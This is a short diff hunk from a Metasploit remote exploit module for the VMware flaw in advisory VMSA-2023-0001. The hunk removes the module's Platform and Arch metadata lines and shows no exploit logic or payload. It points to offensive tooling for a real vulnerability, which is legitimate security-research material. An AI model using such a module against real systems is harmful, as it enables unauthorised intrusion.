@@ -50,8 +50,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://www.vmware.com/security/advisories/VMSA-2023-0001.html'],
         ],
         'DisclosureDate' => '2023-01-24',
-        'Platform' => %w[unix linux],
-        'Arch' => [ARCH_X86, ARCH_X64],
         'Privileged' => true,
         'Targets' => [
           [
